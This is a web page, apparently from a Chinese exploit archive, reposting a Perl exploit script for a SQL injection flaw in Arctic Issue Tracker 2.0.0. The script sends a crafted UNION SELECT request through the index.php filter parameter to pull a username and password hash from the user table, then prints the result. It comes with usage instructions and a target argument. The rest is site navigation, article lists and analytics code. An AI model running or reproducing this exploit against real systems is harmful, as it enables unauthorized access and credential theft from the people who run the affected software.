Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

#!/usr/bin/perl use IO::Socket;
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
----------------------------------------------- }; $webpage = $ARGV[0];
$directory = $ARGV[1];
print " -initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print " -opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\ rtfm geek\n"; } $wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--"; print "~ connecting";
$|=1;
foreach (1..1) {
print ".";
sleep 1;
}
print " OK!\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Server\n"; print "~ open exploiting-tree";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";
print "[ ] Target: $webpage\n";
while ($answer = <$sock>) {
if ($answer =~ /Current Filter: (.*)<\/strong>/) {
print "exploiting in progress";
$|=1;
foreach (1..3) {
print "...";
sleep 1;
}
print "OK!\n[ ] vuln: OK!\n\n\nwell done, ldma!\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "[ ] USER-ID: -1\n";
print "[ ] ID-HASH: $1\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
exit();
}
} close($sock); # ldma

版权声明

本文仅代表作者观点，不代表本站立场。
本文系作者授权发表，未经许可，不得转载。
本文地址：/websafe/Exploit/149273.html

上一篇 : phpDatingClub (website.php page) Local File Inclusion Vulnerability

下一篇 : Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability

相关文章

感受在Vista下的苹果 MacBook Pro笔记本详细评测

Windows版Macbook Pro 三星700Z笔记本首测

作为国产本的骄傲 MateBook来了你兴奋吗

惠普EliteBook 1040 G3:焕新=效率提升+时尚颜值

商务性能强+性价比超高！惠普EliteBook645 G9高性能轻薄商务本评测

攀升MaxBook P2评测：兼具性价比的完美“生产力工具”

惠普ZBook Firefly 15 G8工作站评测：你距离爆款只差一个它

ThinkBook 14p评测：搭载标压处理器，商务本也有高性能

留言与评论（共有 0 条评论）

验证码：

热门文章

1BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

2Pligg

3Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

4PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

5Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

6php Help Agent

7Mole Group Real Estate Script

8BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

9Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability

10DreamNews Manager (id) Remote SQL Injection Vulnerability

最近发表

949元宏碁（Acer）27英寸2K 180Hz高刷1ms(GtG)FastIPS支持HDR新电竞小金刚(VG271U M3bmiipx)

日本雷蛇官网实习生上错价了？游戏本只卖15950日元？

《原神》物归原主又归原主世界任务指南游戏攻略

《原神》振晶的研究第三天试用角色2000分攻略游戏攻略

《原神》2.6版全旋曜玉帛点位说明_蒙德游戏攻略

《原神》2.6版深渊11-1守护镇石技巧游戏攻略

《原神》神里绫华装备搭配推荐游戏攻略

《原神》云堇突破材料获取方法游戏攻略

《原神》世界任务他乡迷失客攻略游戏攻略

《原神》神里绫华全面培养指南神里绫华技能详解与出装建议游戏攻略

标签列表

开放世界

沙盒

win10

3D设计

PS

鬼谷八荒

win7

手游

团队竞技

原神

二次元游戏

策略

电脑常识

王者荣耀

照片处理

MySQL

吃鸡

笔记本

绝地求生大逃杀

射击竞争

1000元配置

2000元配置

3000元配置

4000元配置

5000元配置

6000元配置

7000元配置

8000元配置

9000元配置

万元配置

i3配置

i5配置

i7配置

APU配置

R5配置

R7配置

游戏攻略

软件教程

Win10教程

Win7教程

Mac教程

Linux教程

U盘教程

Server教程

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

版权声明

热门文章

最近发表

标签列表

| 桂ICP备2023010378号-4

Powered By EmpireCMS

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

版权声明

相关文章

热门文章

最近发表

标签列表

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?1cc50873f5e983e8073d99a425b87921"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); | 桂ICP备2023010378号-4

Powered By EmpireCMS

| 桂ICP备2023010378号-4